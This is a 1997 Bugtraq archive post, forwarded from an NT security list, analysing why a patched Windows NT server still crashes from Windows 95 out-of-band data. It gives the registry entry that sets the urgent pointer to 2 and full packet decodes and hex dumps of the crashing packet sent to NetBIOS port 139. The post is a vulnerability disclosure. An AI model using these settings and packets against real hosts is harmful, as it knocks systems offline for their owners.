Bugtraq mailing list archives
Son of OOB part II - answer? (long)
From: aleph1 () DFW NET (Aleph One)
Date: Sat, 24 May 1997 11:22:39 -0500
---------- Forwarded message ---------- Date: 22 May 97 9:49:09 EDT From: Ryan Russell/SYBASE <Ryan.Russell () sybase com> Reply-To: Ryan () phoenix iss net, Russell/SYBASE () phoenix iss net To: ntsecurity <ntsecurity () iss net> Subject: [NTSEC] Son of OOB part II - answer? (long) You have to love the irony of this one: It turns out that if you apply the registry fix from this page: http://www.ntsecurity.net/security/oob.htm then your Win95 client can still crash an NT box. This answers my own earlier question.. I broke out my sniffer, and it looks liek the difference is in the urgent pointer. The one that will still crash seems to have an urgent pointer of 2, and the one that doesn't has an urgent pointer of 3. Here's what seems to be an explaination of why there is a difference, from TCP/IP Illustrated Volume 1, Stevens 1994, p. 292-293 (it looks like I may be quoting a quote, but I can't tell for sure) "There is continuing debate about whether the urgent pointer points to the last byte or ugent data, or to the byte following the last byte of urgent data. The original TCP specification gave both interpretations but the Host Requirements RFC identifies which is correct: the urgent pointer points to the last byte of urgent data. The problem, however, is that most implementations (i.e. the Berkeley-derived implementations) continue to use the wrong interpretation. An implementation that follows the specification in the Host Requirements RFC might be compliant, but might not communicate correctly with most other hosts." At least the Win95 designers seem to have allowed for both possibilities. Anyway, anyone who makes the following registry entry on their Win95 machine: [HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\MSTCP] "BSDUrgent"="0" Can still crash NT at will, it seems. The Win95 machine with the registry entry applied doesn't seem to be affected by either type of OOB crash. I've also included the two different packets (I believe I've included the only pertinant packet out of the sequence) so that if I've misinterpreted the reason, one can draw their own conclusions. These were tested against an NT 3.51 server with SP5 and the Hotfix installed. Ryan Still crashes: DLC: ----- DLC Header ----- DLC: DLC: Frame 7 arrived at 08:17:26.6547; frame size is 60 (003C hex) bytes. DLC: Destination = Station Compaq38E42A DLC: Source = Station Compaq78C49E DLC: Ethertype = 0800 (IP) DLC: IP: ----- IP Header ----- IP: IP: Version = 4, header length = 20 bytes IP: Type of service = 00 IP: 000. .... = routine IP: ...0 .... = normal delay IP: .... 0... = normal throughput IP: .... .0.. = normal reliability IP: Total length = 43 bytes IP: Identification = 17152 IP: Flags = 4X IP: .1.. .... = don't fragment IP: ..0. .... = last fragment IP: Fragment offset = 0 bytes IP: Time to live = 32 seconds/hops IP: Protocol = 6 (TCP) IP: Header checksum = 4B5B (correct) IP: Source address = [130.214.99.98] IP: Destination address = [130.214.99.99], netcom_nt.sybase.com IP: No options IP: TCP: ----- TCP header ----- TCP: TCP: Source port = 1030 TCP: Destination port = 139 (NetBIOS-ssn) TCP: Sequence number = 97385 TCP: Acknowledgment number = 56167856 TCP: Data offset = 20 bytes TCP: Flags = 38 TCP: ..1. .... = Urgent pointer TCP: ...1 .... = Acknowledgment TCP: .... 1... = Push TCP: .... .0.. = (No reset) TCP: .... ..0. = (No SYN) TCP: .... ...0 = (No FIN) TCP: Window = 8760 TCP: Checksum = 877F (correct) TCP: Urgent pointer = 2 TCP: No TCP options TCP: [3 byte(s) of data] TCP: NETB: ----- NetBIOS Session protocol ----- NETB: NETB: [3 more bytes of user data] NETB: ADDR HEX ASCII 0000 00 80 5F 38 E4 2A 00 80 5F 78 C4 9E 08 00 45 00 .._8.*.._x....E. 0010 00 2B 43 00 40 00 20 06 4B 5B 82 D6 63 62 82 D6 .+C.@. .K[..cb.. 0020 63 63 04 06 00 8B 00 01 7C 69 03 59 0D B0 50 38 cc......|i.Y..P8 0030 22 38 87 7F 00 02 42 79 65 00 00 00 "8....Bye... Doesn't crash any more: IP: Fragment offset = 0 bytes IP: Time to live = 32 seconds/hops IP: Protocol = 6 (TCP) IP: Header checksum = 835B (correct) IP: Source address = [130.214.99.98] IP: Destination address = [130.214.99.99], netcom_nt.sybase.com IP: No options IP: TCP: ----- TCP header ----- TCP: TCP: Source port = 1026 TCP: Destination port = 139 (NetBIOS-ssn) TCP: Sequence number = 69792 TCP: Acknowledgment number = 136447 TCP: Data offset = 20 bytes TCP: Flags = 38 TCP: ..1. .... = Urgent pointer TCP: ...1 .... = Acknowledgment TCP: .... 1... = Push TCP: .... .0.. = (No reset) TCP: .... ..0. = (No SYN) TCP: .... ...0 = (No FIN) TCP: Window = 8760 TCP: Checksum = EF53 (correct) TCP: Urgent pointer = 3 TCP: No TCP options TCP: [3 byte(s) of data] TCP: NETB: ----- NetBIOS Session protocol ----- NETB: NETB: [3 more bytes of user data] NETB: ADDR HEX ASCII 0000 00 80 5F 38 E4 2A 00 80 5F 78 C4 9E 08 00 45 00 .._8.*.._x....E. 0010 00 2B 0B 00 40 00 20 06 83 5B 82 D6 63 62 82 D6 .+..@. ..[..cb.. 0020 63 63 04 02 00 8B 00 01 10 A0 00 02 14 FF 50 38 cc............P8 0030 22 38 EF 53 00 03 42 79 65 00 00 00 "8.S..Bye...
Current thread:
- Son of OOB part II - answer? (long) Aleph One (May 24)